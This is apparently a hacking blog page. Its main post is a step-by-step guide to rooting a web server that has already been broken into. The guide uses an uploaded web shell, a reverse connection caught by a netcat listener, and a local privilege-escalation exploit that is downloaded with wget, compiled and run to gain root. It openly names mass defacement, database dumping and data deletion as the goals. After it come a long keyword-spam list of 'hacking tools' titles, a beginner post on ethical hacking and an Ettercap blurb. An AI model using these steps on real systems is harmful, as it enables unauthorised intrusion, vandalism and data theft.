domingo, 28 de janeiro de 2024

HOW TO ROOT A SERVER? – SERVER ROOTING

Servers serve the requests made by the users to the web pages, it acts as a helping hand who serves the requested meal for you. Here I am sharing how to root a server. Root is the Administrator of all server. If someone got root access to it, he can do anything with a server like delete and copy anything on the server, can deface all the websites (massive deface ).
We can't talk about root on windows. That enough for a beginner because if I talk about the root I need another book. So, I guess now we know the importance of root access and why we try to get root.

HOW TO ROOT A SERVER?

There are 3 ways to get ROOT on the server :
1 – With local Root.
2 – With SQL by reading the same important files on it root password.
3 – With exploit on software (Buffer Overflow).
In this post, we will explain local Root. I will explain the other ways soon in some other post.
OK, let's back to work.
After Uploading your shell on the server and getting the local root you will do a back connect and run the local root to Get root. This is a small idea of how it works in the next step you will see how to
find local root and run it to get root access.

HOW TO SEARCH LOCAL ROOT?

First of all we you need to know what version of Kernel.
You can know that from your shell, for example, this version is 2.6.18 – 2012
Go to EXECUTE on your shell and write  "uname -a". You will get the same result, by the way.
Now how to find the local root.
You can use various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc who provides these local roots. One more thing to notice is, that there exist two types of local roots :
1. Local.C: which are not ready.
2. Local: ready to use.

HOW TO GET ROOT ACCESS?

First, you need a shell with a Back Connect option like this :
Enter your "Public IP Address" in SERVER, the port you want to connect on and leave it, Perl, this time, and Finally connect.
So now you must receive the back connect with a Tool named netcat u can download it from the
net. After that open your terminal if you are under Linux or CMD  if you are under Windows. I will explain only Linux, and for Windows, its all the same.
After that Follow the steps :
1- Press nc -vlp 433
2- Wget [the link of the local-Root.zip]
3 – unzip local-Root.zip

4 – chmod 777 local.c

5 – now to change the local-root from local.c > local
gcc local.c -o local Then you will find local.c transformed to local

6 – chmod 777 local

7 – ./local to local rootwork

8 – su
then see your id uid=0(root) gid=0(root) groups=0(root)


Getting UID=0 means, u had got root privileges and hence can do a variety of stuff on the remote server say Mass deface, dump database, redirect sites, change content, etc etc.
AFTER THE ROOT 
As server gets rooted, you're able to do the many things with it like I mentioned above. Such as, withdrawal of domains, massive deface and also deletion of the data completely.

Continue reading


  1. How To Install Pentest Tools In Ubuntu
  2. Hack Tools For Pc
  3. Tools For Hacker
  4. Pentest Recon Tools
  5. Pentest Tools Nmap
  6. Free Pentest Tools For Windows
  7. Hacking App
  8. Hacking Tools Github
  9. Hacking Tools Name
  10. Hack App
  11. Hacking Tools Name
  12. Easy Hack Tools
  13. Hacker Tools Software
  14. Pentest Tools Website
  15. Pentest Tools For Mac
  16. Hack Tools For Pc
  17. Pentest Tools Free
  18. Pentest Tools Tcp Port Scanner
  19. Underground Hacker Sites
  20. Hacking Tools Free Download
  21. Hacking Tools
  22. Hacker Tools Free
  23. Hacking Tools Free Download
  24. Hackrf Tools
  25. Hacking Tools Name
  26. Hack Tools For Ubuntu
  27. Hacking Tools
  28. Hack Tools 2019
  29. Hack Tools For Games
  30. Hacking Tools For Windows 7
  31. Best Pentesting Tools 2018
  32. Best Hacking Tools 2020
  33. Physical Pentest Tools
  34. Hack Tools For Games
  35. Hacking App
  36. Nsa Hacker Tools
  37. Usb Pentest Tools
  38. Hacking Apps
  39. Pentest Tools List
  40. Pentest Reporting Tools
  41. Pentest Tools For Windows
  42. Best Hacking Tools 2020
  43. Pentest Tools Windows
  44. Hack Rom Tools
  45. World No 1 Hacker Software
  46. Hacker Tools Hardware
  47. Pentest Tools For Ubuntu
  48. Pentest Tools Download
  49. Pentest Tools Android
  50. Physical Pentest Tools
  51. Hacker Tools For Ios
  52. Hacker Tools Mac
  53. Hack Tools For Windows
  54. Hacking Tools Hardware
  55. Computer Hacker
  56. Hacker Tools For Windows
  57. Hacking Tools Free Download
  58. Pentest Tools Open Source
  59. Hacker Tools Software
  60. Hacking Tools Download
  61. Game Hacking
  62. Hacking Tools Pc
  63. Hacker Tools Apk Download
  64. Hak5 Tools
  65. Hacking Tools For Games
  66. Hacking Tools For Kali Linux
  67. Hack Tools
  68. Hackers Toolbox
  69. How To Hack
  70. Hacking Tools Software
  71. Install Pentest Tools Ubuntu
  72. Hak5 Tools
  73. Hacking Tools 2020
  74. Growth Hacker Tools
  75. Easy Hack Tools
  76. Hacker Tools
  77. Hacker Tools Hardware
  78. New Hacker Tools
  79. New Hacker Tools
  80. Hacking Tools For Windows
  81. Pentest Tools Github
  82. Computer Hacker
  83. Best Hacking Tools 2019
  84. Hack Website Online Tool
  85. Top Pentest Tools
  86. Pentest Tools Review
  87. Hack Tools
  88. Hack Tools For Pc
  89. Pentest Tools Subdomain
  90. Hacking Tools Free Download
  91. Hackrf Tools
  92. Hacking Tools
  93. Hack Tools 2019
  94. Hack Apps
  95. Hacker Tools Free Download
  96. Physical Pentest Tools
  97. New Hacker Tools
  98. Growth Hacker Tools
  99. Hacker Tools List
  100. Hacking Tools Name
  101. Hacking Tools 2019
  102. Hacking Tools Windows
  103. Pentest Recon Tools
  104. Pentest Tools Tcp Port Scanner
  105. Physical Pentest Tools
  106. Hacking Tools
  107. Pentest Tools Android
  108. Pentest Box Tools Download
  109. Hacking Tools Windows
  110. Game Hacking
  111. Hacker Security Tools
  112. Hack Tools For Mac
  113. Hacking Tools Windows 10
  114. Install Pentest Tools Ubuntu
  115. Hacking App
  116. Best Hacking Tools 2019
  117. Hacking Tools For Mac
  118. Hacker Tools Software
  119. Pentest Tools Online
  120. Hacking Tools For Games
  121. Hack Tools For Ubuntu
  122. Pentest Tools Framework
  123. Hackers Toolbox
  124. Hacking Tools Pc
  125. Hack Tools
  126. Pentest Tools List
  127. Hacking Tools 2020
  128. Hacker Tools
  129. Hack Tool Apk No Root
  130. Hacking Tools Software
  131. Underground Hacker Sites
  132. Hack Tools
  133. Hacker Tools Free Download
  134. Hack Tool Apk
  135. Hacker Tools Mac
  136. Pentest Tools
  137. Hacking Tools Name
  138. Pentest Tools Windows
  139. Best Pentesting Tools 2018
  140. Pentest Reporting Tools
  141. Hacker Hardware Tools
  142. Pentest Tools Github
  143. Hack Apps
  144. Pentest Tools Github
  145. Hacker Tools For Mac
  146. Nsa Hack Tools
  147. Hacking Tools Hardware
  148. Hack Tools For Ubuntu
  149. Hack Tools
  150. Tools Used For Hacking
  151. Pentest Tools Free
  152. Pentest Tools Url Fuzzer
  153. Pentest Tools Kali Linux
  154. Hacking Tools Name
  155. Pentest Tools Github
  156. Hacking Tools Name
  157. Hacker Tools List
  158. Pentest Tools Android
  159. Hack Tools
  160. Hacker Tools 2020
  161. Hacking Tools For Games
  162. Pentest Tools Kali Linux
  163. Pentest Tools Online
  164. Growth Hacker Tools
  165. Hacker Security Tools
  166. Pentest Tools Find Subdomains
  167. Hacking Tools For Windows
  168. Kik Hack Tools
  169. Hack App
  170. Pentest Tools List
  171. Hacking Tools Usb
  172. Hacker Tools List
  173. Pentest Tools Review
  174. Hacker Tools Apk Download
  175. Tools For Hacker

How To Start | How To Become An Ethical Hacker

Are you tired of reading endless news stories about ethical hacking and not really knowing what that means? Let's change that!
This Post is for the people that:

  • Have No Experience With Cybersecurity (Ethical Hacking)
  • Have Limited Experience.
  • Those That Just Can't Get A Break


OK, let's dive into the post and suggest some ways that you can get ahead in Cybersecurity.
I receive many messages on how to become a hacker. "I'm a beginner in hacking, how should I start?" or "I want to be able to hack my friend's Facebook account" are some of the more frequent queries. Hacking is a skill. And you must remember that if you want to learn hacking solely for the fun of hacking into your friend's Facebook account or email, things will not work out for you. You should decide to learn hacking because of your fascination for technology and your desire to be an expert in computer systems. Its time to change the color of your hat 😀

 I've had my good share of Hats. Black, white or sometimes a blackish shade of grey. The darker it gets, the more fun you have.

If you have no experience don't worry. We ALL had to start somewhere, and we ALL needed help to get where we are today. No one is an island and no one is born with all the necessary skills. Period.OK, so you have zero experience and limited skills…my advice in this instance is that you teach yourself some absolute fundamentals.
Let's get this party started.
  •  What is hacking?
Hacking is identifying weakness and vulnerabilities of some system and gaining access with it.
Hacker gets unauthorized access by targeting system while ethical hacker have an official permission in a lawful and legitimate manner to assess the security posture of a target system(s)

 There's some types of hackers, a bit of "terminology".
White hat — ethical hacker.
Black hat — classical hacker, get unauthorized access.
Grey hat — person who gets unauthorized access but reveals the weaknesses to the company.
Script kiddie — person with no technical skills just used pre-made tools.
Hacktivist — person who hacks for some idea and leaves some messages. For example strike against copyright.
  •  Skills required to become ethical hacker.
  1. Curosity anf exploration
  2. Operating System
  3. Fundamentals of Networking
*Note this sites





Related news

Ettercap: Man In The Middle (MITM)


"Ettercap is a suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis." read more...


Website: http://ettercap.sourceforge.net

Related news